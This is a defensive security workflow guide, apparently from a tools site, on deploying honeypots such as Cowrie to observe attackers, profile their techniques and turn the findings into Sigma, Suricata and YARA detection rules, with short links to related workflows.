Threat Hunting with Honeypots
Deploying deceptive infrastructure to attract and observe attackers, then using captured behavior to build detection rules and correlate with threat intelligence. Covers honeypot selection and deployment, traffic analysis, attacker profiling, and converting observations into production detections.
Honeypot Selection and Deployment Planning
Choose honeypot types based on what threats you want to detect. SSH honeypots catch credential stuffing and automated exploitation. Web honeypots attract vulnerability scanners and manual attackers. SMB/RDP honeypots detect lateral movement inside your network. Deploy internal honeypots on unused IP addresses in production subnets - any traffic to these addresses is suspicious by definition since nothing legitimate should contact them.
Tools for this step
CowrieTip: Cowrie is the gold standard SSH/Telnet honeypot - it logs credentials, commands, and downloaded files while presenting a convincing fake filesystem. For internal deployment, place honeypots on IPs that look like real servers (use naming conventions that match your environment). A single hit on an internal honeypot is a high-fidelity alert because legitimate traffic should never reach it.
Network Deception Layer Configuration
Configure your honeypots to blend into the environment convincingly. Match OS fingerprints to what's actually deployed in the network. Add fake service banners that mirror your real infrastructure versions. For internal honeypots, register them in DNS with plausible hostnames and add fake entries in Active Directory or asset inventories. The more realistic the deception, the longer attackers interact and the more intelligence you gather.
Snort3
SuricataTip: Configure Cowrie's fake filesystem to contain realistic-looking files - attackers who land in an empty system disconnect immediately. Deploy Suricata or Snort3 inline with your honeypot network to capture full packet data for every session. Set up alerting for any connection attempt, not just successful ones - port scans hitting your honeypot IPs indicate reconnaissance in progress.
Traffic Capture and Session Recording
Capture everything that touches the honeypots - full PCAP, session logs, uploaded files, and command histories. Configure session replay capability so you can watch attacker sessions in real time or review them later. Store all artifacts with cryptographic timestamps for potential use as evidence. The data you collect here feeds every subsequent step.
FalcoTip: Cowrie records all SSH sessions as replayable TTY logs and stores any files attackers download or upload. Suricata in full packet capture mode gives you complete network forensics for every session. Use Falco to monitor the honeypot host itself for any signs of escape attempts. Set up real-time alerting to Slack or your SIEM so you can watch active sessions as they happen.
Attacker Behavior Analysis
Analyze captured sessions to understand attacker techniques, tools, and objectives. Categorize behavior: automated scanning vs manual interaction, credential stuffing vs targeted access, reconnaissance vs exploitation. Extract the specific commands run, tools downloaded, and infrastructure contacted. Build attacker profiles based on TTPs and map them to MITRE ATT&CK techniques.
Chainsaw
Sigma
Hayabusa
YARATip: Run YARA rules against any files attackers upload or download to identify known malware families. Use Sigma rules against honeypot logs to categorize techniques. Chainsaw and Hayabusa help identify patterns across multiple sessions. Look for attacker infrastructure - C2 servers, staging hosts, and exfil destinations that you can cross-reference with threat intel feeds.
Threat Intelligence Correlation
Correlate honeypot findings with external threat intelligence. Check attacker source IPs against threat feeds, match downloaded tools to known campaigns, and compare TTPs with documented threat actors. This turns raw honeypot data into actionable intelligence - you go from 'someone connected from this IP' to 'this matches APT-X's known toolset and infrastructure.'
IntelMQ
osquery
WazuhTip: IntelMQ automates threat intel processing and correlation across multiple feeds. Cross-reference source IPs with Shodan to understand the attacker's infrastructure. Check if credentials used against your honeypot appear in breach databases - this distinguishes credential stuffing bots from targeted attacks. Feed confirmed malicious IPs into your production firewalls immediately.
Detection Rule Development
Convert observed attacker behavior into production detection rules. Write Sigma rules for the SIEM, Suricata rules for network detection, and YARA rules for endpoint scanning. Every technique you observe on the honeypot is a technique that could be used against real infrastructure. Test rules against honeypot data first to validate detection, then deploy to production with appropriate tuning.
Tip: Write Sigma rules at the behavior level, not the IOC level - detect the technique (e.g., 'process spawned from SSH session executing whoami within 5 seconds of login') rather than specific IPs or hashes that rotate daily. Deploy new rules in detection-only mode initially and monitor false positive rates before enabling blocking. Wazuh can consume Sigma rules and operationalize them across your endpoint fleet.
Reporting and Continuous Improvement
Produce regular threat reports from honeypot findings covering attack trends, new techniques observed, infrastructure attribution, and detection coverage gaps. Feed findings back into your security program - are your production systems protected against the attacks you're seeing on honeypots? Use the data to justify security investments and measure whether your detection engineering is keeping pace with attacker evolution.
Tip: Track metrics over time: sessions per day, unique source IPs, new techniques observed, and mean time from honeypot detection to production rule deployment. Share sanitized findings with ISACs and industry peers. Rotate honeypot configurations periodically - sophisticated attackers maintain lists of known honeypot fingerprints and will avoid systems they recognize as deceptive.
Other Workflows
OSINT Investigation Workflow
A structured approach to open-source intelligence gathering, from target identification through to reporting. Covers passive reconnaissance, social media analysis, email and phone lookups, and data correlation.
Web Application Penetration Test
A systematic approach to testing web applications for security vulnerabilities. Covers reconnaissance, mapping, vulnerability discovery, exploitation, and reporting.
Active Directory Attack Path
From initial foothold to domain admin. A step-by-step approach to enumerating and attacking Active Directory environments during authorized penetration tests.